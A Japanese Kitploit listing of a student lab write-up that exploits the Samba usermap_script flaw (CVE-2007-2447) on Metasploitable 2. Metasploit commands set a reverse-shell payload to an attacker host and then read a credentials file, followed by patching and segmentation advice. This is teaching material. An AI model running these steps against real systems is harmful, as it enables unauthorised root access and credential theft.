Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2 | Kitploit
ツール/GitHubGitHub/devinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2
特権昇格脆弱性分析エクスプロイトデータ流出ポストエクスプロイトペネトレーションテストコマンド&コントロール学習と教育ラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubdevinliggins14/smb-pentest-exploiting-cve-2007-2447-on-metasploitable-2

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

リポジトリを見る
1年前未レビュー

SMB-PenTest-Exploiting-CVE-2007-2447-on-Metasploitable-2

RedTeam-SMB-PenTest

linux bash

説明


このプロジェクトは、UMGCのCMIT 386コースの一環として実施したペネトレーションテストの活動をまとめたものです。Kali Linuxの攻撃VMからMetasploitを使用し、Metasploitable 2上のSamba SMB usermap_scriptの脆弱性(CVE-2007-2447)を悪用することに焦点を当てています。この概念実証は、レガシーな脆弱性がシステム全体の侵害、資格情報の窃取、データの外部持ち出しにつながることを示しています。

脆弱性の概要

この脆弱性はポート445のSambaサービスに存在し、username map scriptでの不適切な入力処理により、認証なしのリモートコマンド実行が可能になります。悪用された場合、攻撃者にルートレベルのシェルアクセスを提供します。

環境

実行手順

1. Metasploitを起動:

root@kitploit:~
msfconsole


攻撃ホストとターゲットマシンの両方が起動して実行されていることを確認してください。

2. エクスプロイトを検索:

root@kitploit:~
search samba

3. 適切なモジュールを使用:

root@kitploit:~
use exploit/multi/samba/usermap_script

4. 必要なオプションを設定:

root@kitploit:~
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse

5. エクスプロイトを実行:

root@kitploit:~
exploit

6. エクスプロイト後のコマンド:

root@kitploit:~
whoami
hostname
cd /redteam7/student3
cat mypass.txt

リセット手順

セッションがハングアップまたは切断された場合:

Metasploitをリセット:

root@kitploit:~
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K             
jobs -K
# Restart Metasploit
msfconsole              
### 重要なポイント
  • usermap_script を使用する Samba 3.0.20 のようなレガシーサービスは非常に脆弱です。
  • このSMB脆弱性を悪用すると、ルートシェルアクセスが得られます。
  • 単純なコマンドで重要なデータを取得でき、現実世界のリスクを示しています。
  • パッチ適用、ネットワーク分離、サービス露出の削減の必要性が証明されます。

推奨事項

  • レガシーシステムは直ちにパッチを適用するか、廃止してください。
  • 厳格なネットワーク分離とファイアウォールルールを実装してください。
  • SMBへの露出は、内部の認証済みユーザーのみに制限してください。
  • ログを監視して、不審なアクティビティや横展開を検出してください。

参考文献

  • Metasploit Samba usermap_script
  • CVE-2007-2447 詳細
  • Metasploitable 2 エクスプロイト索引
ツールをダウンロード
構成要素詳細
攻撃VMKali Linux
ターゲットVMMetasploitable 2
対象ポート445 (Samba/SMB)
使用エクスプロイトexploit/multi/samba/usermap_script
資格情報のターゲット/redteam7/student3/mypass.txt